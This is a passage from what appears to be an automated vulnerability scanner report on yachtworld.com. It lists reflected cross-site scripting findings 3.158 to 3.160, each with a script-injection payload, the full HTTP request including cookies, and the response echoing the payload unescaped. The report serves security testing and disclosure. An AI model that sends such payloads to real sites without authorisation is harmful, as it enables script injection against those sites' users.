<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2250145&boat_id=2250145&back=/core/boats/2008/Regulator-32-Classic-2250145/Babylon72d5c"><script>alert(1)</script>fd63f2294c2/NY/United-States&boat_id=2250145">
...[SNIP]...

3.158. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17a58"><script>alert(1)</script>037c2766c59 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Classic-2250145/Babylon/NY17a58"><script>alert(1)</script>037c2766c59/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 27 Jan 2011 17:33:34 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2250145&boat_id=2250145&back=/core/boats/2008/Regulator-32-Classic-2250145/Babylon/NY17a58"><script>alert(1)</script>037c2766c59/United-States&boat_id=2250145">
...[SNIP]...

3.159. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cdba"><script>alert(1)</script>07c72c71ca was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States5cdba"><script>alert(1)</script>07c72c71ca HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:53 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 27 Jan 2011 17:33:34 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:53 GMT
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2250145&boat_id=2250145&back=/core/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States5cdba"><script>alert(1)</script>07c72c71ca&boat_id=2250145">
...[SNIP]...

3.160. http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25f13"><script>alert(1)</script>64310e7d56b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States?25f13"><script>alert(1)</script>64310e7d56b=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:02:36 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 27 Jan 2011 17:33:34 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2250145%5B%25%5D32%27+Regulator+32+Classic%5B%25%5DUSD%26nbsp%3B159%2C900%5B%25%5DBabylon%2C+NY%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F0%2F1%2F2250145_1_mini.jpg%3F1282409230000%5B%25%5D%2Fboats%2F2008%2FRegulator-32-Classic-2250145%2FBabylon%2FNY%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%